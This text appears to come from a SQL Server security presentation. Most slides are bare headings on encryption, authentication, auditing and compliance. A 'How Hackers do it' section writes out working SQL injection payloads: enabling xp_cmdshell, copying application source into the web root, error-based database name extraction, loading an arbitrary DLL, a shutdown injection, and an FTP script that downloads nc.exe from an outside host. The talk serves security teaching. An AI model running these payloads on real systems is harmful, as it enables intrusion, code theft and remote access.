SQL SERVER SECURITYClement ArulCTO Mega Fortris

AGENDA

Im a . . .

BUSINESS CHALLENGES

BUSINESS NEEDS

DB VULNERABILITIES

SQL SERVER 2005 SECURITY Recap

SQL SERVER 2005 SECURITY Recap

SQL SERVER 2008 SECURITY

Extensible Key Management (EKM)

Extensible Key Management (EKM)

Transparent Data Encryption (TDE)

Advantages of using TDE

CONTROL ACCESS

Authentication Enhancements

Authentication Features

ENSURE COMPLIANCE

Policy-Based Management

Reduced Surface Area Configuration

SQL SERVER AUDIT

SQL SERVER AUDIT

How Hackers do it ?

SQL INJECTION BASIC TRICKS

Extended Stored Procedures

Enabling xp_cmdshell in SQL Server 2005 / 2008 / R2EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE

Note : By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. [If you have admin access, you can enable them]

Example 1 :

To execute a shell command that writes the output of the command dir c:\inetpub in a browseable file, assuming that the web server and the DB server reside on the same host : exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'-Alternatively, we can use sp_makewebtask: exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--

Example 2 : The SQL Server built-in function db_name() can be used to trigger an error that will return the name of the database: /controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_ name()) Example 3 : Obtaining the application's source code a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--

Example 4 : Add new procedure (virtually you can execute whatever you want)

sp_addextendedproc xp_webserver, c:\temp\x.dll exec xp_webserver

Example 5 : Start and stop Windows Services. xp_servicecontrol (START or STOP)

Example 6 : Upload Executables Once xp_cmdshell is enabled, uploading becomes a CAT walk.[If the target allows FTP connections, inject the following queries]:

exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';-exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';-exec master..xp_cmdshell 'echo bin >> ftpscript.txt';-exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';-exec master..xp_cmdshell 'echo quit >> ftpscript.txt';-exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--

Tools =

Windows : Bobcat , Unix : Sqlninja

';shutdown -

Q&A

References Microsoft Security Development Lifecyclehttp://www.microsoft.com/sdl

Security Configuration Benchmark for SQL Server 2005 & 2008 & R2http://cisecurity.org/

The Open Web Application Security Project (OWASP)http://www.owasp.org

clementarul@megafortris.com http://www.innov8orz.com/blog